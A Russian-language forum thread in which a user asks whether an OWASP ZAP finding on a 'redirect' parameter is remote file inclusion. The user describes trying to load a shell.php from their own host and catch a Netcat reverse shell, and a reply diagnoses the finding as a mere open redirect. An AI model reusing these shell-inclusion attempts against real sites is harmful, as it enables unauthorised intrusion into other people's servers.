HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Подскажите насчет найденной уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.07.2022, 00:40
gilo20
Новичок
Регистрация: 18.07.2022
Сообщений: 2
С нами: 2014186

Репутация: 0
По умолчанию
Нашел уязвимость c помощью owasp zap, выдало как RFI, но не уверен, что это так.
Параметр страницы:
currency_code=&redirect=http%3A%2F%2Fwww.google.co m%2F, и редиректит на страницу гугл.

Пытался залить шелл:
currency_code=&redirect=http://ip/shell.php, файл скачивает, но с помощью Netcat обратную оболочку не дает.
С чем это связано, и есть ли тут вообще RFI или только OPEN REDIRECT?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.07.2022, 12:38
larchik
Новичок
Регистрация: 07.06.2019
Сообщений: 0
С нами: 3650634

Репутация: 0
По умолчанию
Цитата:

gilo20 сказал(а):

есть ли тут вообще RFI или только OPEN REDIRECT?

Судя по всему, только редирект. Если бы был RFI, то тебя не ридеректило бы, а вместо этого содержимое гугл-страницы отображалось бы на странице целевого сайта.
На удаленном сервере http://ip/ (где shell.php) подними веб сервер:
Код:
python3 -m http.server 8000
и подставь адрес http://ip:8000/ в параметр redirect твоего запроса. На удаленном сервере скорее всего увидишь свой собственный ip и юзер-агент.
 
Ответить с цитированием

  #3  
Старый 20.07.2022, 11:10
gilo20
Новичок
Регистрация: 18.07.2022
Сообщений: 2
С нами: 2014186

Репутация: 0
По умолчанию
Цитата:

larchik сказал(а):

Судя по всему, только редирект. Если бы был RFI, то тебя не ридеректило бы, а вместо этого содержимое гугл-страницы отображалось бы на странице целевого сайта.
На удаленном сервере http://ip/ (где shell.php) подними веб сервер:
Код:
python3 -m http.server 8000
и подставь адрес http://ip:8000/ в параметр redirect твоего запроса. На удаленном сервере скорее всего увидишь свой собственный ip и юзер-агент.

Да, спасибо. Только редирект оказался.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.